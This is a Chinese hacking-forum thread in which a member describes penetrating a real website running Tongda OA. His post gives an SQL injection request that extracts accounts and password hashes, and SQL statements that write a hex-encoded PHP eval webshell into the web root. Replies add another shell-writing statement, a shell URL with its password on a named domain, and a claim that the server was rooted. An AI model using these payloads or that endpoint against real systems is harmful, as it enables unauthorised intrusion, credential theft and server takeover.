九零»90WiKi - 90Sec Team --== 资料库==-- 账号审核 {Account audit} 对某站的一次渗透过程
返回列表

[【通过】] 对某站的一次渗透过程

[复制链接]
MrFk 发表于 2017-2-19 18:47:05 | 显示全部楼层 |阅读模式

正式成员|主题 |帖子 |积分 5

本帖最后由 MrFk 于 2017-2-20 11:19 编辑

90sec投稿文章0x00 信息收集

目标站:www.xxx.com

端口开放情况:

2017-1.png

在80,800,8080找到web服务

80端口渗透无果

8080端口是市教育系统,不敢下手,故从800端口入手

0x01 sql注入取得关键信息

从主页得知cms类型为通达oa教育版

http://mrfk.lol/content/images/2017/02/2017-2-1.png

利用之前的漏洞直接报错注入出账号密码,payload:

POST /general/document/index.php/recv/register/turn HTTP/1.1 User-Agent: curl/7.33.0 Host: **.**.**.** Accept: */* Proxy-Connection: Keep-Alive Content-Length: 33 Content-Type: application/x-www-form-urlencoded _SERVER=&rid=EXP(~(SELECT*FROM(SELECT concat(user_id,0x7e,password) from user LIMIT 0,1)a))

http://mrfk.lol/content/images/2017/02/6.png

0x02 失败的尝试

由于最开始还没有购买cmd5的时候,我未能解开这种加密方式(md5(unix)),于是只好从别处入手,在注入的时候得到一个没有密码的账号,登陆进后台后试图通过http://static.hx99.net/static/bugs/wooyun-2014-061251.html这种方式getshell,但是新版register_globals=off了,所以这种方法失败.

0x03 成功getshell

解开md5,密码为admin!,登陆后台.

在网页的系统信息栏找到oa的绝对路径
http://mrfk.lol/content/images/2017/02/7.png

于是利用sql导入功能写入shell(这是一个坑点,利用前人的经验未能成功,本地复现也未能成功)

前人的payload:

update mysql.user set file_priv='Y' where user='root'; flush privileges; select concat("'",0x3C3F706870206563686F2022776F6F79756E20746573742E223B3F3E) into outfile '../webroot/test.php'; update mysql.user set file_priv='N' where user='root'; flush privileges;

我测试之后,需要导入两次这样的sql:

update mysql.user set file_priv='Y' where user='root'; flush privileges; select concat("'",0x3C3F70687020406576616C28245F504F53545B273930736563275D29203F3E) into outfile 'd:/myoa/webroot/test.php';

成功getshell

http://mrfk.lol/content/images/2017/02/8.png

http://mrfk.lol/content/images/2017/02/9.png

0x04 结语

虽然东西很基础,但是也学到了不少东西,算是一个记录吧.


评分

参与人数 1酒票 +5 收起 理由
管理05 + 5 欢迎加入90!

查看全部评分

回复

举报

80uncle 发表于 2017-2-19 20:56:27 | 显示全部楼层

九零元老|主题 |帖子 |积分 62

select '一句话' into outfile 'd:/myoa/90sec.php';
这样就行了
回复

举报

老锥 发表于 2017-2-19 22:16:18 | 显示全部楼层

正式成员|主题 |帖子 |积分 70

Nmap扫描那露点了,楼主记得打马赛克
回复

举报

any3ite 发表于 2017-2-19 22:19:03 | 显示全部楼层

正式成员|主题 |帖子 |积分 144

漏电了已经
回复

举报

小透明 发表于 2017-2-19 23:04:22 | 显示全部楼层

正式成员|主题 |帖子 |积分 153

www.flwz.cn/inc/esb/pockwrokflowview.php  密码:90sec
回复

举报

 楼主 MrFk 发表于 2017-2-20 11:19:49 | 显示全部楼层

正式成员|主题 |帖子 |积分 5

RE: 对某站的一次渗透过程

老锥 发表于 2017-2-19 22:16
Nmap扫描那露点了,楼主记得打马赛克

已打马,多谢
回复

举报

芙蓉王 发表于 2017-3-6 07:47:16 | 显示全部楼层

正式成员|主题 |帖子 |积分 201

本帖最后由 芙蓉王 于 2017-3-6 08:55 编辑

尴尬露点了

服务器已提
回复

举报

芙蓉王 发表于 2017-3-6 07:49:35 | 显示全部楼层

正式成员|主题 |帖子 |积分 201

RE: 对某站的一次渗透过程

80uncle 发表于 2017-2-19 20:56
select '一句话' into outfile 'd:/myoa/90sec.php';
这样就行了

表哥你这种语句导入会被拦截提示不安全的sql语句
回复

举报

nullily 发表于 2017-3-6 09:48:22 | 显示全部楼层

正式成员|主题 |帖子 |积分 127

RE: 对某站的一次渗透过程

芙蓉王 发表于 2017-3-6 07:47
尴尬露点了

服务器已提

大牛啊
回复

举报

返回列表
快速回复 返回顶部 返回列表